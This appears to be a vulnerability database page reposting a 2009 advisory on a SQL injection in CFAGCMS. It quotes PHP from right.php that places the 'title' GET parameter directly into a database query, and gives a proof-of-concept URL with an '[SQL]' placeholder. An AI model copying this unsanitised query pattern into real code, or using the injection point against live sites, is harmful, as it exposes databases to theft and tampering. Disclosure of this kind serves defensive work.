Lucene search

CFAGCMS SQL Injection Exploit

🗓️ 19 Dec 2009 00:00:00Reported by cr4wl3rType

zdt🔗 0day.today👁 23 Views

CFAGCMS SQL Injection Exploi

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

=============================
CFAGCMS SQL Injection Exploit
=============================

################################################################################
## Exploit Title: CFAGCMS SQL Injection Exploit                               ##
## Date: 20-12-2009                                                           ##
## Author: cr4wl3r                                                            ##
## Software Link: http://sourceforge.net/project/showfiles.php?group_id=197936##
## Version: N/A                                                               ##
## Tested on: GNU/LINUX                                                       ##
################################################################################
 
 
~ Code [right.php]
 
$title  = $_GET['title'];
$query  = "SELECT * FROM pages WHERE title = '".$title."'";
$result = mysql_query($query);
 
~ PoC
 
[cfagcms_path]/right.php?title=[SQL]



#  0day.today [2018-01-04]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

19 Dec 2009 00:00Current

7.1High risk

Vulners AI Score7.1